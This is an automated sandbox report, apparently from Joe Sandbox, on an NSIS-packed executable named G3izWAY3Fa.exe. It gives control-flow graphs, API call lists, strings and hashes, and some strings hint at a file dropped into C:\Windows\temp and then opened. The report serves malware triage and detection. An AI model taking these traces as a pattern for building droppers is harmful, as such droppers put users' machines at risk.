                                                                                              control_flow_graph 177 402c22-402c70 GetTickCount GetModuleFileNameA call 4056b4 180 402c72-402c77 177->180 181 402c7c-402caa call 4059dd call 405517 call 4059dd GetFileSize 177->181 182 402e54-402e58 180->182 189 402cb0 181->189 190 402d97-402da5 call 402bbe 181->190 191 402cb5-402ccc 189->191 197 402da7-402daa 190->197 198 402dfa-402dff 190->198 193 402cd0-402cd2 call 40304e 191->193 194 402cce 191->194 201 402cd7-402cd9 193->201 194->193 199 402dac-402dc4 call 403080 call 40304e 197->199 200 402dce-402df8 GlobalAlloc call 403080 call 402e5b 197->200 198->182 199->198 223 402dc6-402dcc 199->223 200->198 228 402e0b-402e1c 200->228 203 402e01-402e09 call 402bbe 201->203 204 402cdf-402ce6 201->204 203->198 207 402d62-402d66 204->207 208 402ce8-402cfc call 405675 204->208 212 402d70-402d76 207->212 213 402d68-402d6f call 402bbe 207->213 208->212 226 402cfe-402d05 208->226 219 402d85-402d8f 212->219 220 402d78-402d82 call 405d6b 212->220 213->212 219->191 227 402d95 219->227 220->219 223->198 223->200 226->212 232 402d07-402d0e 226->232 227->190 229 402e24-402e29 228->229 230 402e1e 228->230 233 402e2a-402e30 229->233 230->229 232->212 234 402d10-402d17 232->234 233->233 235 402e32-402e4d SetFilePointer call 405675 233->235 234->212 236 402d19-402d20 234->236 239 402e52 235->239 236->212 238 402d22-402d42 236->238 238->198 240 402d48-402d4c 238->240 239->182 241 402d54-402d5c 240->241 242 402d4e-402d52 240->242 241->212 243 402d5e-402d60 241->243 242->227 242->241 243->212
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402C33
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\G3izWAY3Fa.exe,00000400), ref: 00402C4F
                                                                                                • Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
                                                                                                • Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 00402C9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$(pA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                              • API String ID: 4283519449-616736272
                                                                                              • Opcode ID: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
                                                                                              • Instruction ID: bb8333a86194dcf573844375b596ab0c7c07cd824b72df89bd2f0bbec4532e5a
                                                                                              • Opcode Fuzzy Hash: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
                                                                                              • Instruction Fuzzy Hash: 21511971A00214ABDB209F65DE89B9E7BB4EF04319F10403BF904B62D1D7BC9E458BAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 244 401734-401757 call 4029f6 call 40553d 249 401761-401773 call 4059dd call 4054d0 lstrcatA 244->249 250 401759-40175f call 4059dd 244->250 255 401778-40177e call 405c3f 249->255 250->255 260 401783-401787 255->260 261 401789-401793 call 405cd8 260->261 262 4017ba-4017bd 260->262 269 4017a5-4017b7 261->269 270 401795-4017a3 CompareFileTime 261->270 264 4017c5-4017e1 call 4056b4 262->264 265 4017bf-4017c0 call 405695 262->265 272 4017e3-4017e6 264->272 273 401859-401882 call 404d7b call 402e5b 264->273 265->264 269->262 270->269 274 4017e8-40182a call 4059dd * 2 call 4059ff call 4059dd call 40529e 272->274 275 40183b-401845 call 404d7b 272->275 285 401884-401888 273->285 286 40188a-401896 SetFileTime 273->286 274->260 307 401830-401831 274->307 287 40184e-401854 275->287 285->286 290 40189c-4018a7 CloseHandle 285->290 286->290 291 402894 287->291 294 40288b-40288e 290->294 295 4018ad-4018b0 290->295 293 402896-40289a 291->293 294->291 297 4018b2-4018c3 call 4059ff lstrcatA 295->297 298 4018c5-4018c8 call 4059ff 295->298 304 4018cd-402213 call 40529e 297->304 298->304 304->293 311 40265c-402663 304->311 307->287 310 401833-401834 307->310 310->275 311->294
                                                                                              APIs
                                                                                              • lstrcatA.KERNEL32(00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 00401773
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: C:\Windows\temp$open$open C:\Windows\temp\Edit9
                                                                                              • API String ID: 1941528284-3341607499
                                                                                              • Opcode ID: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
                                                                                              • Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
                                                                                              • Opcode Fuzzy Hash: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
                                                                                              • Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 312 402e5b-402e6f 313 402e71 312->313 314 402e78-402e80 312->314 313->314 315 402e82 314->315 316 402e87-402e8c 314->316 315->316 317 402e9c-402ea9 call 40304e 316->317 318 402e8e-402e97 call 403080 316->318 322 402ff9 317->322 323 402eaf-402eb3 317->323 318->317 324 402ffb-402ffc 322->324 325 402fe2-402fe4 323->325 326 402eb9-402ed9 GetTickCount call 405dd9 323->326 327 403047-40304b 324->327 328 402fe6-402fe9 325->328 329 403039-40303d 325->329 337 403044 326->337 338 402edf-402ee7 326->338 334 402feb 328->334 335 402fee-402ff7 call 40304e 328->335 332 402ffe-403004 329->332 333 40303f 329->333 339 403006 332->339 340 403009-403017 call 40304e 332->340 333->337 334->335 335->322 345 403041 335->345 337->327 342 402ee9 338->342 343 402eec-402efa call 40304e 338->343 339->340 340->322 349 403019-40302c WriteFile 340->349 342->343 343->322 350 402f00-402f09 343->350 345->337 351 402fde-402fe0 349->351 352 40302e-403031 349->352 353 402f0f-402f2c call 405df9 350->353 351->324 352->351 354 403033-403036 352->354 357 402f32-402f49 GetTickCount 353->357 358 402fda-402fdc 353->358 354->329 359 402f4b-402f53 357->359 360 402f8e-402f92 357->360 358->324 363 402f55-402f59 359->363 364 402f5b-402f8b MulDiv wsprintfA call 404d7b 359->364 361 402f94-402f97 360->361 362 402fcf-402fd2 360->362 365 402fb7-402fbd 361->365 366 402f99-402fab WriteFile 361->366 362->338 367 402fd8 362->367 363->360 363->364 364->360 370 402fc3-402fc7 365->370 366->351 369 402fad-402fb0 366->369 367->337 369->351 372 402fb2-402fb5 369->372 370->353 373 402fcd 370->373 372->370 373->337
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402EB9
                                                                                              • GetTickCount.KERNEL32 ref: 00402F3A
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                                                                              • wsprintfA.USER32 ref: 00402F77
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,0040F020,00000000,00000000), ref: 00402FA3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountTick$FileWritewsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 4209647438-2449383134
                                                                                              • Opcode ID: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                                                                              • Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
                                                                                              • Opcode Fuzzy Hash: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                                                                              • Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 374 4015b3-4015c6 call 4029f6 call 405564 379 4015c8-4015e3 call 4054fb CreateDirectoryA 374->379 380 40160a-40160d 374->380 387 401600-401608 379->387 388 4015e5-4015f0 GetLastError 379->388 382 40162d-402169 call 401423 380->382 383 40160f-401628 call 401423 call 4059dd SetCurrentDirectoryA 380->383 395 40288b-40289a 382->395 383->395 387->379 387->380 393 4015f2-4015fb GetFileAttributesA 388->393 394 4015fd 388->394 393->387 393->394 394->387
                                                                                              APIs
                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00405316,?,00421880,00000000,004055C8,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405572
                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                                                                                • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                                                                              • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                              • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Windows\temp,00000000,00000000,000000F0), ref: 00401622
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                              • String ID: C:\Windows\temp
                                                                                              • API String ID: 3751793516-823764690
                                                                                              • Opcode ID: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
                                                                                              • Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
                                                                                              • Opcode Fuzzy Hash: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
                                                                                              • Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 399 4056e3-4056ed 400 4056ee-405718 GetTickCount GetTempFileNameA 399->400 401 405727-405729 400->401 402 40571a-40571c 400->402 404 405721-405724 401->404 402->400 403 40571e 402->403 403->404
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004056F6
                                                                                              • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-2753553320
                                                                                              • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                              • Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
                                                                                              • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                              • Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                              • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 4115351271-3283962145
                                                                                              • Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                              • Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
                                                                                              • Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
                                                                                              • Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 500 4063dd-4063e3 501 4063e5-4063e7 500->501 502 4063e8-406406 500->502 501->502 503 406614-406629 502->503 504 4066d9-4066e6 502->504 505 406643-406659 503->505 506 40662b-406641 503->506 507 406710-406714 504->507 508 40665c-406663 505->508 506->508 509 406774-406787 507->509 510 406716-406737 507->510 511 406665-406669 508->511 512 40668a 508->512 515 406690-406696 509->515 513 406750-406763 510->513 514 406739-40674e 510->514 516 406818-406822 511->516 517 40666f-406687 511->517 512->515 519 406766-40676d 513->519 514->519 521 406843 515->521 522 405e3b 515->522 520 40682e-406841 516->520 517->512 523 40670d 519->523 524 40676f 519->524 525 406846-40684a 520->525 521->525 526 405e42-405e46 522->526 527 405f82-405fa3 522->527 528 405ee7-405eeb 522->528 529 405f57-405f5b 522->529 523->507 533 4066f2-40670a 524->533 534 406824 524->534 526->520 535 405e4c-405e59 526->535 527->503 531 405ef1-405f0a 528->531 532 406797-4067a1 528->532 536 405f61-405f75 529->536 537 4067a6-4067b0 529->537 538 405f0d-405f11 531->538 532->520 533->523 534->520 535->521 539 405e5f-405ea5 535->539 540 405f78-405f80 536->540 537->520 538->528 541 405f13-405f19 538->541 542 405ea7-405eab 539->542 543 405ecd-405ecf 539->543 540->527 540->529 544 405f43-405f55 541->544 545 405f1b-405f22 541->545 546 405eb6-405ec4 GlobalAlloc 542->546 547 405ead-405eb0 GlobalFree 542->547 548 405ed1-405edb 543->548 549 405edd-405ee5 543->549 544->540 550 405f24-405f27 GlobalFree 545->550 551 405f2d-405f3d GlobalAlloc 545->551 546->521 552 405eca 546->552 547->546 548->548 548->549 549->538 550->551 551->521 551->544 552->543
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                              • Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
                                                                                              • Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
                                                                                              • Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 553 4065de-4065e2 554 406604-406611 553->554 555 4065e4-4066e6 553->555 557 406614-406629 554->557 565 406710-406714 555->565 558 406643-406659 557->558 559 40662b-406641 557->559 561 40665c-406663 558->561 559->561 563 406665-406669 561->563 564 40668a 561->564 566 406818-406822 563->566 567 40666f-406687 563->567 568 406690-406696 564->568 569 406774-406787 565->569 570 406716-406737 565->570 571 40682e-406841 566->571 567->564 575 406843 568->575 576 405e3b 568->576 569->568 573 406750-406763 570->573 574 406739-40674e 570->574 577 406846-40684a 571->577 578 406766-40676d 573->578 574->578 575->577 579 405e42-405e46 576->579 580 405f82-405fa3 576->580 581 405ee7-405eeb 576->581 582 405f57-405f5b 576->582 583 40670d 578->583 584 40676f 578->584 579->571 587 405e4c-405e59 579->587 580->557 585 405ef1-405f0a 581->585 586 406797-4067a1 581->586 588 405f61-405f75 582->588 589 4067a6-4067b0 582->589 583->565 592 4066f2-40670a 584->592 593 406824 584->593 591 405f0d-405f11 585->591 586->571 587->575 594 405e5f-405ea5 587->594 595 405f78-405f80 588->595 589->571 591->581 596 405f13-405f19 591->596 592->583 593->571 597 405ea7-405eab 594->597 598 405ecd-405ecf 594->598 595->580 595->582 599 405f43-405f55 596->599 600 405f1b-405f22 596->600 601 405eb6-405ec4 GlobalAlloc 597->601 602 405ead-405eb0 GlobalFree 597->602 603 405ed1-405edb 598->603 604 405edd-405ee5 598->604 599->595 605 405f24-405f27 GlobalFree 600->605 606 405f2d-405f3d GlobalAlloc 600->606 601->575 607 405eca 601->607 602->601 603->603 603->604 604->591 605->606 606->575 606->599 607->598
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
